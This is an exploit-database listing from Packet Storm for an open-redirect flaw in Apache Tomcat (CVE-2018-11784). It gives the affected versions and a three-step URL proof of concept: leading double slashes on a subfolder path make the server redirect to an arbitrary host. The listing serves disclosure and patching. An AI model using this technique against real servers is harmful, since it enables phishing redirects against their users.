Lucene search

K
packetstormCentral InfosecPACKETSTORM:163456
HistoryJul 11, 2021 - 12:00 a.m.

Apache Tomcat 9.0.0M1 Open Redirect

2021-07-1100:00:00
Central Infosec
packetstormsecurity.com
376

0.791 High

EPSS

Percentile

98.3%

`# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect  
# Date: 10/04/2018  
# Exploit Author: Central InfoSec  
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90  
# CVE : CVE-2018-11784  
  
# Proof of Concept:  
  
# Identify a subfolder within your application  
http://example.com/test/  
  
# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash  
http://example.com//test  
  
# Browse to the newly created URL and the application will perform a redirection  
http://test/  
`